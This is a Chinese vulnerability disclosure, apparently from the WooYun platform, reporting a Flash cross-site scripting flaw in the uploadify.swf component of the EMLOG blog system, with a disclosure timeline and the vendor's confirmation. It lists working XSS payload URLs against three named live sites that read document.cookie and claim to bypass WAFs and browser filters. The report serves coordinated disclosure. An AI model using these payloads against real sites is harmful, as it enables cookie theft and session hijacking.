漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-07-28: 细节已通知厂商并且等待厂商处理中
2014-08-01: 厂商已经确认,细节仅向厂商公开
2014-08-04: 细节向第三方安全合作伙伴开放
2014-09-25: 细节向核心白帽子及相关领域专家公开
2014-10-05: 细节向普通白帽子公开
2014-10-15: 细节向实习白帽子公开
2014-10-26: 细节向公众公开
简要描述:
RT
详细说明:
官方主机站测试一下:
http://host.emlog.net/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//
开发者之一奇遇的博客:
http://blog.qiyuuu.com/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//
思想之地:
http://be-evil.org/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//
等等我就不多列举了。
因为是flash xss,所以无视服务端WAF,无视浏览器filter~
关于这个swf我就不想多说了,老问题。
漏洞证明:
官方主机站测试一下:
http://host.emlog.net/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//
开发者之一奇遇的博客:
http://blog.qiyuuu.com/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//
思想之地:
http://be-evil.org/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//
修复方案:
修复swf
版权声明:转载请注明来源 phith0n@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2014-08-01 16:00
厂商回复:
确认,是EMLOG采用的上传组件过滤不严格导致的,我们会尽快发布补丁。
最新状态:
暂无